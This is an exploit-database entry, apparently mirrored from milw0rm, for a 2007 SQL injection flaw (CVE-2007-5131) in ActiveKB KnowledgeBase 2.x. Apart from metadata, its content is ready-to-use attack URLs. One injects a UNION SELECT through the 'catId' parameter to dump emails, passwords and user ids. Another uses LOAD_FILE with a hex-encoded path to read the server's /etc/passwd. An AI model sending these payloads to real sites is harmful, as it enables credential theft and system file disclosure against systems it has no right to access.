[] NeoSense
E X P L O I T S
title author type platform port cve id

ActiveKB KnowledgeBase 2.x - 'catId' SQL Injection

Author: Luna-Tic/XTErner
type: webapps
platform: php
port: 
date_added: 2007-09-25 
date_updated: 2016-11-29 
verified: 1 
codes: OSVDB-39624;CVE-2007-5131 
tags: 
aliases:  
screenshot_url:  
application_url: 
 ActiveKB NX 2.? ( Powered by ActiveKB Knowledgebase Software)  (index.php) SQL Injection

                              Discovered by Luna-Tic and XTErner 19 Years Ukrainian Hackers

Vendor:www.interspire.com/activekb/

License:sharewere

Exploit:/kb/index.php?ToDo=browse&catId=[SQL CODE]
http://www.xxx.net/kb/index.html?ToDo=browse&catId=-20+union+select+1,concat(email,0x3a,password,0x3a,userid),3,4,5,6,7+from+user--
https://www.xxx.com/faq/index.php?ToDo=browse&catId=-10+union+select+1,LOAD_FILE(0x2f6574632f706173737764),3,4,5,6,7+members/*

# milw0rm.com [2007-09-26]
Billing Policy . Cookies Policy . Conditions . Disclaimer . ICANN Policy . Legal Notice . Privacy Policy . Spam Policy . Usage Policy
Copyright © 2026 NEOSENSE. All rights reserved.